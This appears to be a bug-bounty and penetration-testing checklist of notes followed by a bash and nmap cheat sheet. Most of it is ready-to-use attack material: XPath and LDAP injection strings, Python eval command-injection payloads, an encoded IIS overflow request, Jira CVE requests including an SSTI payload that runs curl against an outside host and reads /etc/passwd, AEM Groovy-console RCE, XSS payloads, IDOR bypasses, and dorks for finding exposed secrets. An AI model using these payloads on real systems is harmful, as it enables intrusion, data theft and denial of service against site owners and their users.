'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2[ ] LDAP Injection
*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|[ ] Authorization
https://www.securify.nl/en/advisory/authorization-bypass-in-infinitewp-admin-panel/Register vulnerabilty
register vulnerability
[ ] Duplicate registration overwrite existing user
1. create first account in application with email say abc@gmail.com and password
2. logout of the account and create another account with same email and different password
3. you can even try to change email case like from abc2gmail.com to Abc@gmail.com
4. finish the creation proccess and see that it succceed
5. now go back and try to login with email and the new password ,you are seccess logged in[ ] Dos at name /password field in sign up page
1. go to sign up form
2. fill the form and enter a long string in password
3. click on enter and you will get 500 internal server error if it is vulnerability[ ] no rate limit at signup page
1. enter your details in signuo form and submit the form
2. capture the signuo request and send it to intruder
3. add $$ to email parameter
4. in the payload add different email address
5. fire up intruder and check whether it return 200 ok[ ] xss in username,email
xss can be test in any of parameter
1. payload for text field:
2. payload for email field:
3. you can use bypassing filter[ ] email varification can be easily bypassed with following method
1. response manipulation change the bad respone with good one like false to true
2. status code manipulation change the 403 to 200[ ] weak register implemntation
1. check whether the allows disposable email addresses
2. register form on non-https page[ ] weak password policy
1. check whether application allows easily guessable passsword like 123456
2. check if you can use username same as the email address
3. check if can use password same as that email address
4. improperly implemented password recovery link functionality[ ] Path Overwrite
If an application allows users to check their profile with direct path /{username} always try to signup with system reserved file names, such as index.php, signup.php, login.php, etc. In some cases what happens here is, when you signup with username: index.php, now upon visiting target.tld/index.php, your profile will comeup and occupy the index.php page of an application. Similarly, if an attacker is able to signup with username login.php, Imagine login page getting takeovered.Cookie Attack
[ ] sensetive Data Stored in Cookies
check if anf pii or other sensitive infromation stored in cookies this in fromation usually includes : email,sessionID, data of birth ,mobile address ,ssn ,etc.[ ] cookie length violation leads to Buffer Overflow : A cookie length which is longer than profiled length can indicate that a buffer overflow attack attempt takes place. In a buffer overflow attack, the attacker will have to send very long strings that will generate the overflow, all of them generating this Violation.
GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a[ ] Arbitrary Cookie injection
try injecting some arbitrary cookies using attack such as CRLF injection ,
some times it can be used to escalate privilege or if the application malfunction, it can reveal sensitive infromation through stack traces[ ] Mass Assignment
similar to the parameter poolution, however in this , attacker tried to inject multiple user ID in same user_id parameter[ ] Damial of service - cookie Bomb
forcing the server to process cookies larger than the resricted cookie size defined by the server may cause danial of service attack
https://target.com/index.php?param1=xxxxxxxxxxxxxxxxxxxxxx
After input "xxxxxxxxxxxxxxxxxxxxxx" as a value of param1, check your cookies. If there is cookies the value is "xxxxxxxxxxxxxxxxxxxxxx" it means the website is vulnerable
References: [Hackerone #105363](https://hackerone.com/reports/105363)
[ ] SQL injection
How to inject the code in Cookies?
There are many HTTP interceptors and HTTP editors that can intercept the HTTP request before it is sent to the server. Then the tester can introduce his malicious SQL statement in the cookie field.
It’s like a get/post based SQL Injection, except that certain characters can’t be used. For example, ‘**;**‘ and ‘**,**‘ are typically treated as delimiters, so they end the injection if they aren’t URL-encoded.
Cookie : sessionId=xxxbad1fdc’ order by 1# (Normal)_
Cookie : sessionId=xxxbad1fdc’ order by 2# (Error)_
after error
sqlmap -u "" --cookie="" -p "" --dbs[ ] parameter pollution
1. Assume that cookie utilize a parameter called **user_id=** to rerieve some data
2. however , the application is not vulnerability to idor and change **user_id** to victim value dosnt help you
3.attacker ,add an addition another **user_id=** parameter value to rhe cookie with vuctim user ID LIke: **user_id=atacker&user_id=victim**
4. Three things can happen here:
- the application may retrieve data of victim data
- the application may retrieve data of victim data and attacker data
- the application is not retrieve data it is not vulnerability[ ] Authentication Bybass (cookie are not avalid)
try accessing a protected resource by removing cookies[ ] xss
assume that the value of the cookie parameter "name" is reflected in the application
change the "name" value to "xss payload"[ ] Insufficient session management
1. session doesnt expire on logout
2. long session expirey
3. session doesnt expire on password reset /change
4. concurrent session[ ] privilege escalation
horizontal
1.assume that the application uses mult-organization models
2.cookie are used wich organized user can access
3.alter the cookie in order to access some other applicationvertical
1.assume the cookie are used to determine the role of the user
2.alter the cookie in order to elevate the role of the usersimilarly
1.try if the flower users cookies can be used to access higher users function
2.try if the cookie of organization 1 user van be used to access function of organizaion 2[ ] sesion puzzing
when an application utilzes the same session variable for multiple purposes , this can abused by an attacker to trick the application and perform the action as an authenticated or privileged user[ ] Exploiting Python Code Injection this payload in cookie or contenttype or path or parameter
eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))[ ] OS command injection
**eval(compile("""for x in range(1):\\n import os\\n os.popen(r'COMMAND').read()""",'','single'))**eval(compile("""__import__('os').popen(r'COMMAND').read()""",'','single'))**__import__('os').popen('COMMAND').read()**[ ] URL encode some characters
param=eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29param=eval%28compile%28%22%22%22for%20x%20in%20range%281%29%3A%5Cn%20import%20os%5Cn%20os.popen%28r%27COMMAND%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29param=eval%28compile%28%22%22%22__import__%28%27os%27%29.popen%28r%27COMMAND%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29param=__import__%28%27os%27%29.popen%28%27COMMAND%27%29.read%28%29Example with one expression
__import__('os').popen('COMMAND').read()Example with multiple expressions, separated by commas
str("-"*50),__import__('os').popen('COMMAND').read()[ ] Insecure Deserialization
if cookis are using serialized Objects ,try performing insecure Deserialization Checks.
portswigger laps[ ] Electronic Code Book [ ] Pickle Code Execution [ ] Cipher block chainin [ ] file inclusion [ ] IDOr [ ] session fixation [ ] padding oracle attack [ ] jwt attack
Jire vulnerability
[ ] jirescan
https://github.com/netspooky/jLoot
https://github.com/0x48piraj/Jiraffe
https://github.com/bcoles/jira_scan
https://github.com/MayankPandey01/Jira-Lens
nuclie template [ ] cve-2017-9506 (ssrf)
Navigate to <JIRA_URL>/plugins/servlet/oauth/users/icon-url?consumerUri=<ssrf payload>[ ] cve-2018-20824 (xss)
Navigate to <JIRA_URL>/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)[ ] cve-2019-8451 (ssrf)
Navigate to <JIRA_URL>/plugins/servlet/gadgets/makeRequest?url=https://<host_name>:1337@example.com[ ] cve-2019-8449 (user info disclosure)
Navigate to <JIRA_URL>/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true[ ] cve-2019-8442 (sen info disc)
Navigate to <JIRA_URL>/s/thiscanbeanythingyouwant/_/META-INF/ maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
Observe that the pom.xml file is accessible.[ ] cve-2019-3403 (username enum)
Navigate to <Jira_URL>/rest/api/2/user/ picker?query=<user_name_here>
Observe the difference in response when valid vs. invalid user is queried.[ ] cve-2019-3402 (xss)
Navigate to <JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
Observe that the payload is getting executed.[ ] cve-2019-3396 (path traversal, rce)
1. Try Below POST Request with the JIRA Target
2. POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (X11; Linux x86_ 64; rv:60.0) Gecko/20100101 Firefox/60.0 Referer: {{Hostname}}
Content-Length: 168
Connection: close <give an enter and remove this comment>
{"contentId":"786457","macro":{" name":"widget","body":"","params":{"url":" https://www.viddler.com/v/23464dc5"," width":"1000","height":"1000","_template":"file:///etc/passwd"}}}[ ] cve-2019-11581 (template inj)
Navigate to <JIRA_URL>/secure/ContactAdministrators!default.jspa
Try SSTI payload in subject and/or body:
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://xyz.burp(.)net').waitFor()[ ] cve-2020-14179 (info disclosure)
Navigate to <JIRA_URL>/secure/QueryComponent!Default.jspa
It leaks information about custom fields, custom SLA, etc.[ ] cve-2020-14178 (project key enumeration)
Navigate to <JIRA_URL>/browse.<project_ key>
Observe the error message on valid vs. invalid project key. Apart from the Enumeration, you can often get unauthenticated access to the project if the protections are not in place.[ ] cve-2020-14181 (user enumeration)
Navigate to <JIRA_URL>/secure/ ViewUserHover.jspa?username=<username>
Observe the response when valid vs. invalid username is provided.[ ] CVE-2022-26135 ( Full-Read Server Side Request Forgery in Mobile Plugin for Jira Data Center and Server )
https://github.com/assetnote/jira-mobile-ssrf-exploitThe following HTTP request can be used to reproduce this issue, once authenticated to the Jira instance:
POST /rest/nativemobile/1.0/batch HTTP/2
Host: issues.example.com
Cookie: JSESSIONID=44C6A24A15A1128CE78586A0FA1B1662; seraph.rememberme.cookie=818752%3Acc12c66e2f048b9d50eff8548800262587b3e9b1; atlassian.xsrf.token=AES2-GIY1-7JLS-HNZJ_db57d0893ec4d2e2f81c51c1a8984bde993b7445_lin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Origin: https://issues.example.com
Referer: https://issues.example.com/plugins/servlet/desk
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 63
{"requests":[{"method":"GET","location":"@example.com"}]}[ ] Check Privileges Inside a Jira instance any user (even non-authenticated) can check its privileges in
/rest/api/2/mypermissions or
/rest/api/3/mypermissions These endpoints will return your current privileges.If a non-authenticated user have any privilege, this is a vulnerability (bounty?).If an authenticated user have any unexpected privilege, this a a vuln.
#Check non-authenticated privileges
curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"havePermission": true'[ ] CVE-2017-9506 , CVE-2019-8449 , CVE-2019-11581,CVE-2019-8451
https://github.com/0x48piraj/Jiraffe[ ] cve-2018-5230
https://hackerone.com/reports/380354
https://jira.atlassian.com/browse/JRASERVER-67289
HOW TO EXPLOIT: https://host/issues/?filter=-8
Go to the link above
Click the "Updated Range:" text area
Put your XSS payload in "More than [ ] minutes ago" (15 character payload limit) or in "In range [ ] to [ ]" (No length limit, ONLY put the payload in the first box) Click Update Payload will run.
If it doesn't run chances are you used double quotes somewhere. Only use single quotes![ ] CVE-2020-29453 (Pre-Auth Limited Arbitrary File Read)
http://host/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
if its not running redirecting to login panel then run it with curl[ ] CVE-2020-36287 (Atlassian JIRA: Incorrect Authorization)
Affected software: Atlassian Jira Data Center, Jira Server (also tested on Jira Project Management Software) Affected Vesrion: Before version 8.13.5, and from version 8.14.0 before version 8.15.1 CVEID: CVE-2020-36287 CVSS Score: 5.3
(Medium) CVSS Score: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Fully Patched Version: 8.13.5, 8.15.1, 8.16.0
Link: https://site.com/secure/Dashboard.jspa
POC: https://site.com/rest/dashboards/1.0/10000/gadget/{ID}/prefs
POC: https://github.com/f4rber/CVE-2020-36287
https://www.rapid7.com/db/vulnerabilities/atlassian-jira-cve-2020-36287/
https://jira.atlassian.com/browse/JRASERVER-72258 [Anonymously accessible Dashboards can leak private information via configured gadgets CVE-2020-36287][ ] CVE-2020-36289 (Atlassian Jira Unauth User Enumeration)
Vulnerable:
Jira < 8.5.13 8.6.0 ≤ Jira < 8.13.5 8.14.0 ≤ Jira < 8.15.1
Summary:
The remote web server hosts a web application that is affected by an information disclosure vulnerability.
Affected endpoint:
https://example.com/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
Description:
The instance of Atlassian Jira hosted on the remote web server is affected by an information disclosure vulnerability in QueryComponentRendererValue!Default.jspa due to an improper access restriction. An unauthenticated, remote
attacker can exploit this, by sending a specially crafted HTTP request, to disclose sensitive information which may aid in further attacks.
References:
https://jira.atlassian.com/browse/JRASERVER-71559
http://www.nessus.org/u?b658a05a[ ] CVE-2021-26084 (Confluence Server Webwork OGNL Injection)
https://github.com/march0s1as/CVE-2021-26084[ ] CVE-2021-26086 (Atlassian Jira Server/Data Center 8.4.0 - Limited Remote File Read/Include)
PoC:
https://github.com/ColdFusionX/CVE-2021-26086
/_/;/WEB-INF/web.xml
/_/;/WEB-INF/decorators.xml
/_/;/WEB-INF/classes/seraph-config.xml
/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
/_/%3B/WEB-INF/web.xml
/_/%3B/WEB-INF/decorators.xml
/_/%3B/WEB-INF/classes/seraph-config.xml
/_/%3B/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/_/%3B/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/_/%3B/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/_/%3B/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
References:
https://cloudsek.com/threatintelligence/jira-software-server-cve-2021-26086-vulnerability-actively-exploited-in-the-wild
https://github.com/ColdFusionX/CVE-2021-26086
https://raw.githubusercontent.com/crowdsecurity/sec-lists/master/web/jira_cve_2021-26086.txt[ ] CVE-2022-0540 - Atlassian Jira Authentication Bypass
https://github.com/Pear1y/CVE-2022-0540-RCE[ ] Google dork section
inurl:/plugins/servlet/wallboard/
(This will give all the Jira dashboard which might be vulnerable to XSS.) (Sensitive Data Exposure)
https://www.exploit-db.com/ghdb/6528
This is testing for confluence(Older version) Found CVE:-2018-20824
Created dork: inurl:"/plugins/servlet/Wallboard/"
EP:/?dashboardId=10102&dashboardId=10103&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=fadeZoom&random=false
https://twitter.com/hackersden_/status/1417573513859244032
Useful Jira dorks:
inurl:"dashboard.jspa"
inurl:xyz intitle:JIRA login
site:*/JIRA/login
intitle:"Log In JIRA" inurl:"8080:/login.jsp"
intext:"Welcome to JIRA" "Powered by a free Atlassian Jira community"
inurl:companyname intitle:JIRA login
inurl:visma intitle:JIRA login
intext:"Confluence" ext:jsp intitle:"Jira"
inurl:http://confluence. login.action
inurl:https://wiki. .com/confluence/
allinurl: /confluence/login.action?
intitle:dashboard-confluence
inurl:/ContactAdministrators!default.jspa
inurl:/secure/attachment/ filetype:log OR filetype:txt[ ] Github recon
Github recon Via github dorks to find secret:-
"site[dot]com" send_keys
"site[dot]com" client_secret
"site[dot]com" jira/root passwordvideo
https://www.youtube.com/watch?v=EQNBQCQMouk
method
collect sub domain
use nuclei/nuclei-templates/technologies/tech-detect.yaml to identifiy aem
Python3 ./aem_hacker.py –u https://example — host localhost
use https://github.com/clarkvoss/AEM-List/blob/main/paths to fuzz on path
aem tools
https://github.com/0ang3el/aem-hacker
https://github.com/0ang3el/aem-rce-bundle
python3 aem_hacker.py -u --host yourvpshostname =>comman usage
python3 aem_discovery.py --file urls.txt --workers 150 =>discover url
python3 aem_enum.py --url => automate usernames and secrets grabbing
python3 aem_ssrf2rce.py --url --fakaem yourvbs
python3 aem_server.py
aem dispatcher bypasses
[ ] bypassing cve 2016-0957
https://aemsite/bin/querybuilder.json => blocked
https://aemsite/bin/querybuilder.json/a.css => allow
https://aemsite/bin/querybuilder.json/a.html => allow
https://aemsite/bin/querybuilder.json/a.ico => allow
https://aemsite/bin/querybuilder.json/a.png => allow
https://aemsite/bin/querybuilder.json;%0aa.css => allow
https://aemsite/bin/querybuilder.json/a.1.json => allow
[ ] bypassing for interesting servlets
https://aemsite/bin/querybuilder.json => blocked
https://aemsite/bin/querybuilder.json/a.css => block
https://aemsite/bin/querybuilder.json;%0aa.css => block
https://aemsite/bin/querybuilder.json.servlet.css => allow
https://aemsite/bin/querybuilder.json.servlet.html => allow
https://aemsite/bin/querybuilder.json.servlet.ico => allow
https://aemsite/bin/querybuilder.json.servlet.png => allow
///etc.json instead of /etc.json
///bin///quesrybuilder.json instead of /bin/quesrybuilder.json[ ] using ssrf
ssrf should allow to send GET request and see response
- Opensocial proxy
- ssrf in reportingservicesproxyservlet(cve-2018-12809)[ ] rce via exposed Groovy console
POST /bin/groovyconsole/post.servlet HTTP/1.1
HOST:
script=sef+proc+%3d+"cat+/etc/passwd".execute()%0d%0aprintln+proc.txt
[ ] xss
POST //////content/usergenerated/etc/commerce/smartlists/vv.json
aa=alert('xss+on+'%2b+document.domain+%2b+'\nby+%400ang3el+\ud83d\ude00')%3b[ ] xss
POST /content/usergenerated/etc/commerce/smartlists/xss
aaa.html=alert('xss+on+'%2b+document.domain+%2b+'\nby+%400ang3el+\ud83d\ude00')%3b[ ] xss
POST /content/usergenerated/etc/commerce/smartlists/xssed
jcr:data=alert('xss+on+'%2b+document.domain+%2b+'\nby+%400ang3el+\ud83d\ude00')%3b&jcr:mimeType=text/html[ ] secret from jcr
everything is stored in jcr repository :
- secrets (password ,encryption key , tokens)
- cinfiguration
- pII
- usernames
** what to use **
- DefaultGETServlet
- QueryBUilderJsonServlet
- QueryBuilderFeedServlet
- GQLSearch Servlet
- other
** DefaultGETServlet **
- Allows to get jsr node with its props
- selectors
- tidy
- infinity
- numeric value:-1,0,1...99999
- formats
- json
- xml
- res
- https://aem.site/tidy.3.json
/ => jcr:root
tidy => selector tidy
3 => selector depth
json => output format
- how to grap
- get node names, start from jcr:root :
- /.1.json
- /.ext.json
- /.childrenlist.json
- or guess node names :
- comman names /content, /home, /var, /etc
- Dump props for each child node of jcr:root :
- /etc.json or /etc.s.json or /etc.-1.json
- what to grap
- interesting nodes
- /etc => may contain secrets (pass,enc,keys)
- /apps/system/config => passwords
- /apps/<smth>/config => passwords
- /var => may contain private pii
- /home => password hashed ,pii
- interesting props-contain aem usernames
- jcr:createdBy
- jcr:lastModifiedBy
- cq:LastModifiedBy [ ] QueryBuild Servlets
- path
- /bin/querybuilder.json
- /bin/querybuilder.feed.servlet
- examples of useful searches
- type=nt:file&nodename=*.zip
- path=/home&p.hits-full&p.limit=-1
- hasPermission=jcr:write&path=/content
- hasPermission=jcr:addChild Nodes&path=/content
- hasPermission=jcr:modify Properties&path=/content
- p.hits-selective&p.properties=jcr%3alastModifiedBy&property=jcr%3alast ModifiedBy&property.operation-unequals&property.value=admin&type=nt%3abase&p.limit=1000
- path=/etc&path.flat=true&p.nodedepth=0
- path=/etc/replication/agents.author&p.hits-full&p.nodedepth=-1[ ] exploit SSRF
ssrf via Opensocial proxy
- /libs/opensocial/proxy?container=default&url=http://target
- /libs/shindig/proxy?container=default&url=http://target
[ ] ReportingServicesProxyServlet
SSRF via ReportingServicesProxyServlet (CVE-2018-12809)
- /libs/ca/contentinsight/content/proxy.reportingservices.json?url=http://target%23/apil.omniture.com/a&q=a
- /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet?url=http://target%23/apil.omniture.com/a&q=a
- /libs/mcm/salesforce/customer.json?checkType=authorize&authorization_url=http://target&customer_key=zzzz&customer_secret-zzzz&redirect_uri=xxxx&code=e
SSRF via SiteCatalystServlet
- /libs/cq/analytics/components/sitecatalystpage/segments.json.servlet
- /libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json[ ] DOS
- /.ext.infinity.json
- /.ext.infinity.json?tidy=true
- /bin/querybuilder.json?type=nt:base&p.limit=-1
- /bin/wcm/search/gql.servlet.json?query=type:base%20limit:..-1&pathPrefix=
- /content.assetsearch.json?query=*&start=0&limit=10&random=123
- /..assetsearch.json?query=*&start=0&limit=10&random=123
- /system/bgservlets/test.json?cycles-999999&interval=0&flushEvery=111111111IDOR
Base Steps:
1. Create two accounts if possible or else enumerate users first.
2. Check if the endpoint is private or public and does it contains any kind of id param.
3. Try changing the param value to some other user and see if does anything to their account.
4. Done !![ ] [ ] image profilie [ ] delete acount [ ] infromation acount [ ] VIEW & DELETE & Create api_key [ ] allows to read any comment [ ] change price [ ] chnage the coin from dollar to uaro [ ] Try decode the ID, if the ID encoded using md5,base64,etc
GET /GetUser/dmljdGltQG1haWwuY29t
[...][ ] change HTTP method
GET /users/delete/victim_id ->403
POST /users/delete/victim_id ->200[ ] Try replacing parameter names
Instead of this:
GET /api/albums?album_id=<album id>
Try This:
GET /api/albums?account_id=<account id>
Tip: There is a Burp extension called Paramalyzer which will help with this by remembering all the parameters you have passed to a host.[ ] Path Traversal
POST /users/delete/victim_id ->403
POST /users/delete/my_id/..victim_id ->200[ ] change request content-type
Content-Type: application/xml ->
Content-Type: application/json[ ] swap non-numeric with numeric id
GET /file?id=90djbkdbkdbd29dd
GET /file?id=302[ ] Missing Function Level Acess Control
GET /admin/profile ->401
GET /Admin/profile ->200
GET /ADMIN/profile ->200
GET /aDmin/profile ->200
GET /adMin/profile ->200
GET /admIn/profile ->200
GET /admiN/profile ->200[ ]send wildcard instead of an id
GET /api/users/user_id ->
GET /api/users/*[ ] Never ignore encoded/hashed ID
for hashed ID ,create multiple accounts and understand the ppattern application users to allot an iD[ ] Google Dorking/public form
search all the endpoints having ID which the search engine may have already indexed[ ] Bruteforce Hidden HTTP parameters
use tools like arjun , paramminer [ ] Bypass object level authorization Add parameter onto the endpoit if not present by defualt
GET /api_v1/messages ->200
GET /api_v1/messages?user_id=victim_uuid ->200[ ] HTTP Parameter POllution Give mult value for same parameter
GET /api_v1/messages?user_id=attacker_id&user_id=victim_id
GET /api_v1/messages?user_id=victim_id&user_id=attacker_id[ ] change file type
GET /user_data/2341 -> 401
GET /user_data/2341.json -> 200
GET /user_data/2341.xml -> 200
GET /user_data/2341.config -> 200
GET /user_data/2341.txt -> 200[ ] json parameter pollution
{"userid":1234,"userid":2542}[ ] Wrap the ID with an array in the body
{"userid":123} ->401
{"userid":[123]} ->200[ ] wrap the id with a json object
{"userid":123} ->401
{"userid":{"userid":123}} ->200[ ] Test an outdata API version
GET /v3/users_data/1234 ->401
GET /v1/users_data/1234 ->200[ ] If the website using graphql, try to find IDOR using graphql!
GET /graphql
[...]GET /graphql.php?query=
[...]Authentication Bypass
[ ]
1. Check if post authentication URLs are directly accessible and do not have any session bound to it.
2. In case the URL is stolen/guessable/brute-forceable, it can lead to account takeover.[ ] CAPTCHA Bypass - X-Forwarded-For
1. Bypass the CAPTCHA check by injecting a random value into the **X-Forwarded-For header[ ] Lack of Password Confirmation
Test if password confirmation is necessary with these actions:
- Change Email Address
- Change Password
- Delete Account
- Manage 2FA[ ] Lack of Verification Email
1. Check that during the registration process, an email verification is necessary[ ] No Rate Limiting on a Form
1. Send a form and intercept the request with Burp proxy
2. Send the request to intruder
3. Repeat sending the same request 20-30 times
4. Observe that all of these forms are sent without any restrictions[ ] No Rate Limiting or Captcha on Login Page
1. Go to login page and send the unsuccessful login attempt request to Burp Intruder
2. Change the password values for brute force as random values
3. Observe that the response to the 20 or 30th request doesn't change and the account is not locked.[ ] Username Email Address Enumeration
1. Go to password reset/login/register or any other area that allows writing username or email address input
2. Write an existing username/email address with wrong password to observe error message
3. Write a non-existing username/email address to observe error message
4. See if error message leaks the information of the existence of username/email addresses[ ] Weak Password Policy
1. Change password to only numerical
2. Change password to only lower case
3. Change password to common passwords
4. Change password to short passwords
5. Observe that the application has weak or no password policy[ ] Weak Registration Implementation over HTTP
1. Intercept the request during the registration to the application via Burp
2. Observe that registration request is sent over HTTP[ ] secure data transport
1. search on login page
2. Send a form and intercept the request with Burp proxy
3. intercept the request with wireshark
4. make sure that the data transport is encryption or not [ ] Username enumeration
1. Status codes
2. Error messages
3. Response times
X-Forwarded-For: [ ] Broken Authentication Session Token Bug
1. Create a courier account or use existing one.
2. Confirm Your email address.
3. Now log out from your account and request for password reset code for your account .
4. Don't use the code that has been sent to your email address.
5. In new tab or new browser log in back to your account.
6. Go to account setting and change your password .
7. Now go to email and check the password reset code that we requested in step 3.
8. Change Your password using that reset password code .
9. You can see that your password has been changed.[ ] Broken Authentication and Session Management
1. Create a Phabricator account having email address "a@x.com".
2. Now Logout and ask for password reset link. Don't use the password reset link sent to your mail address.
3. Login using the same password back and update your email address to "b@x.com" and verify the same. Remove "a@x.com".
4. Now logout and use the password reset link which was mailed to "a@x.com" in step 2.
5. Password will be changed.Simple Bash Scripting Cheatsheet
[+] nano Shortcuts ctrl v Next page. ctrl y Previous page. ctrl w Where is (find). ctrl k Cut that line of test. ctrl x Exit editor.
[+] Create a text file: touch file Creates an empty file. ifconfig > tmp pipe the output of a command nano file
[+] Create a file and append text to it: ifconfig > tmp echo >> tmp ping google.com -c3 >> tmp
[+] How to view a file: cat file Show entire contents of file. more file Show one page at a time. Space bar for next page and (q) to exit. head file Show the first 10 lines. head -15 file Show the first 15 lines. tail file Show the last 10 lines. tail -15 file Show the last 15 lines. tail -f file Useful when viewing the output of a log file.
[+] pipe cat tmp | grep Bcast Feeds the output of one process to the input of another process.
[+] Processes ps aux Show all running process for all users. kill -9 PID Nicely kill a PID.
[+] Word Count wc -l tmp2 Count the number of lines in a file
[+] cut -d delimiter -f fields
[+] sort Sort by unique sort -u file sort IP addresses correct sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u Isolate the IP address
[+] awk awk '{print $1}' file Show the 1st column. awk '{print $1,$5}' file Show the 1st and 5th columns.
[+] grep grep -v Remove a single string. grep -v 'red' file
[+] egrep -v Remove multiple strings egrep -v '(red|white|blue)' file
[+] sed sed 's/FOO/BAR/g' file Replace FOO with BAR. sed 's/FOO//g' file Replace FOO with nothing. sed '/^FOO/d' file Remove lines that start with FOO.
[+] colour 31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan echo -e "\e[1;34mThis is a blue text.\e[0m"
Bash Scripts
[+] Simple bash script: #!/bin/bash clear echo echo print "Hello world."
[+] Make a file executable. chmod +x file chmod 755 file
[+] Variables name=Bob echo $name user=$(whoami) echo $user echo 'Hello' $name. 'You are running as' $user.
#!/bin/bash clear echo "Hello World" name=Bob ip=ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1 echo "Hello" $name "Your IP address is:" $ip
[+] User Input read -p "Domain: " domain
#!/bin/bash echo "Please input your domain:" read -p "Domain:" domain ping -c 5 $domain
[+] Check For No User Input if [ -z $domain ]; then echo echo "#########################" echo echo "Invalid choice." echo exit fi
[+] For loops #!/bin/bash
for host in $(cat hosts.txt) do command $host done
[+] One Liners
Port Scan: for port in $(cat Ports.txt); do nc -nzv 192.168.0.1 $port & sleep 0.5; done
Use a bash loop to find the IP address behind each host: for url in $(cat list.txt); do host $url; done
[+] Condition Onliner
any command && if work || if not work type -p massdns && massdns -r resolver.txt -t A -o S sub.txt -w sub.mass || echo "MassDns not installed"
[+] Condition Onliner with multiple action
any command && { if work; also this; also this } || { if not work; also this; also this } type -p massdns && { massdns -r resolver.txt -t A -o S sub.txt -w sub.mass; cat sub.mass } || { echo "MassDns not installed"; echo "Install MassDns" }
# How to survie inside Kali Linux / Linux in general
Set the ip address as a varble export ip=192.168.1.100 nmap -A -T4 -p- $ip
Netcat port Scanning nc -nvv -w 1 -z $ip 3388-3390
Discover active IPs usign ARP on the network: arp-scan $ip/24
Discover who else is on the network netdiscover
Discover IP Mac and Mac vendors from ARP netdiscover -r $ip/24
Nmap stealth scan using SYN nmap -sS $ip
Nmap stealth scan using FIN nmap -sF $ip
Nmap Banner Grabbing nmap -sV -sT $ip
Nmap OS Fingerprinting nmap -O $ip
Nmap Regular Scan: nmap $ip/24
Enumeration Scan nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt
Enumeration Scan All Ports TCP / UDP and output to a txt file nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip
Nmap output to a file: nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24
Quick Scan: nmap -T4 -F $ip/24
Quick Scan Plus: nmap -sV -T4 -O -F --version-light $ip/24
Quick traceroute nmap -sn --traceroute $ip
All TCP and UDP Ports nmap -v -sU -sS -p- -A -T4 $ip
Intense Scan: nmap -T4 -A -v $ip
Intense Scan Plus UDP nmap -sS -sU -T4 -A -v $ip/24
Intense Scan ALL TCP Ports nmap -p 1-65535 -T4 -A -v $ip/24
Intense Scan - No Ping nmap -T4 -A -v -Pn $ip/24
Ping scan nmap -sn $ip/24
Slow Comprehensive Scan nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24
Scan with Active connect in order to weed out any spoofed ports designed to troll you nmap -p1-65535 -A -T5 -sT $ip
====== Enumeration ======
DNS Enumeration
NMAP DNS Hostnames Lookup nmap -F --dns-server
Host Lookup host -t ns megacorpone.com
Reverse Lookup Brute Force - find domains in the same range for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"
Perform DNS IP Lookup dig a domain-name-here.com @nameserver
